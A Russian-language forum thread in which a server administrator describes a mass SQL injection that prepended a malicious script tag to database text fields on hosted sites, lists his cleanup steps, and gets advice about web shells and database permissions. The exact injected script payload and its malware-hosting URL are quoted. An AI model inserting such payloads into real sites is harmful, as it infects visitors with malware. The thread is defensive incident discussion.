есть сервер 2003 enterprise sp2, стоящий в стойке в дата центре
на нем MS SQL server 2000 sp4 + все автообновления с Windows Update
Подняты встроенные службы: IIS + ftp+smt+dns
Включен встроенный фаервол, в котором открыты 4 порта
dns tcp/udp 53
ftp 21
http 80
terminal 3389
На сервере хоститься порядка 20 сайтов, обшей посешаемостью до 4 тысячи посетителей в день.
Большинство сайтов используют систему управления написанную на ASP vb script более 10лет назад.
Проверенный годами, отлаженный безглючный код.
Сервер в текушей конфигурации бесперебойно проработал больше 4 лет.
3 дня назад злоумышеллниками внесены изменения в SQL базу, причем из 6 имеющихся правки были
внесены только в 1, которая отвечает за наиболее посещаемые сайты.
Во всех таблицах во всех текстовых столбцах в каждой строке перед ликвидной информацией добавили
следующий код: "> </title><script src="http://tenin58gaccel.rr.nu/sl.php?v=3"></script><!--
В итоге, так как даже тайтлы для страничек брались из SQl базы, ни один из сайтов не работал так как
пытался скачать вирус и блокировался антивирусом.
Что предпринял.
Сменил пароль администратора, хотя вроде как он не был подобран,
так как судя по логам успешно входили в системму только через терминал и только в то время, когда заходил я.
Проверил какие файлы были добавлены в систему или модифицированы с момента взлома — ничего
подозрителного. Касперский(с актуальными базами) также ничего не нашел.
Поиск во всех тестовых документах на наличие tenin58gaccel тоже ничего не дал — я думал может в каком-то из ASP фалов разместили код, выполняющий обновление базы.
Переставил SQl сервер с новым SA паролем, +SP4 + Security Update for SQL Server 2000 Service Pack 4 (KB983812).
ДОбавил 1 учетную запись для доступа к SQL серверу из програмного кода — с новым паролем.
Перепроверил правила в фаерволе.
Проверил все встроенные в базы процедуры и запросы — ничего нового и враждебного
Предпринятые меры не помогли: за последные 2 суток базу модифицировали еще 3 раза, причем теперь
ссылка на вирус добавляется только в одну табцу, вследсвии чего он загружается только с тех страниц, на которых есть подписи к картинкам.
Поиск в гугле по rr.nu/sl.php?v=3 (домен 3 уровня в ссылке меняется при кажой новой модификации базы)
выдает кучу сайтов, подвергшихся аналогичной атаке
собсвенно вопрос — может кто знает что это такое и как с этим бороться?
Подскажите как можно выяснить где дыра в безопасности и как ее устранить — первый раз сталкиваюсь
подобной проблемой((
Судя по описанию злоумышленник действует через Sql injection на одном из сайта путем залива Shell на сайт редактирует данные в базе SQL после чего удаляет Shell с вашего сайта. Рекомендую проверить все ваши сайты сканером WVS и устранить все уязвимые места на вашем сайте.
никогда не сталкивался с SQL инжектингом.
На сколько я понял, злоумышленник отсылает с формы на одном из сайтов некий код, который модифицирует правильный update/insert. Тоесть достаточно временно отключить возможность записи в базу путём урезания прав у пользователя, который используется для подключения к базе и при срабатывании исключения логировать все попытки записывая содержимое отправленное с формы. Это сработает?